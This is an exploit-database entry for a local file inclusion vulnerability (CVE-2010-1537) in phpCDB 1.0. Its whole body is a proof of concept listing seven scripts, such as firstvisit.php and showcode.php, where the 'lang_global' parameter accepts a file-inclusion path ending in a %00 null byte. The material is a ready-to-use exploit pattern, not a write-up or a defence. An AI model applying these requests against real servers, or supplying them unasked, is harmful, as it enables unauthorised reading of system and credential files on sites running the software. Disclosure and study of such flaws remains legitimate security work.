phpCDB <= 1.0 - Local File Include Vulnerability



EDB-ID: 11585 CVE: 2010-1537 OSVDB-ID: 64111
Author: cr4wl3r Published: 2010-02-27 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next
##############################################################
##phpCDB <= 1.0 Local File Include Vulnerability
##############################################################
Author: cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg>
Download: http://sourceforge.net/projects/phpcdb/files/
##############################################################
PoC:
 [phpcdb_path]/firstvisit.php?lang_global=[LFI%00]
 [phpcdb_path]/newfolder.php?lang_global=[LFI%00]
 [phpcdb_path]/showfolders.php?lang_global=[LFI%00]
 [phpcdb_path]/newlang.php?lang_global=[LFI%00]
 [phpcdb_path]/showinnerfolder.php?lang_global=[LFI%00]
 [phpcdb_path]/writecode.php?lang_global=[LFI%00]
 [phpcdb_path]/showcode.php?lang_global=[LFI%00]
##############################################################txt